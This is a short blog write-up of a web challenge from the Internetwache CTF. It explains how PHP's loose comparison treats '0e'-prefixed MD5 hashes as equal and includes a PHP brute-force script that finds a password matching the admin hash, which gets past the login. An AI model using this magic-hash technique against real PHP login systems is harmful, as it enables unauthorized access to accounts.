If you like to read our old blogs you are welcome, I4INFO
Well I thought to discuss an 50 problem web challenge, interesting. There is no admin.php on the server, but there is flag.php on the server. We have a login option in which the username is given, and password hash is given , but there is salt involved.
Ya correct whats so interesting, its intresting because here <a href="https://news.ycombinator.com/item?id=9484757" see this article</a>.All those md5 value which start with 0e, are chossen as equal in php,because they're being parsed as floats and getting converted to 0.0. So we can say md5('240610708') == md5('QNKCDZO').
$admin_user = "pr0_adm1n";
$admin_pw = clean_hash("0e408306536730731920197920342119");
function clean_hash($hash) {
return preg_replace("/[^0-9a-f]/","",$hash);
}
function myhash($str) {
return clean_hash(md5(md5($str) . "SALT"));
}
function generateRandomString($length = 10) {
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
for ($i = 0; $i < 100000000; $i++) {
$result = generateRandomString(8);
if (myhash($result) == $admin_pw) {
print("woo!");
print($result . " " . myhash($result) . "\n");
}
}
?>
Reffered from https://eugenekolo.com
This was one of the problems in web in Internetwache CTF.
Thank you for reading the blog!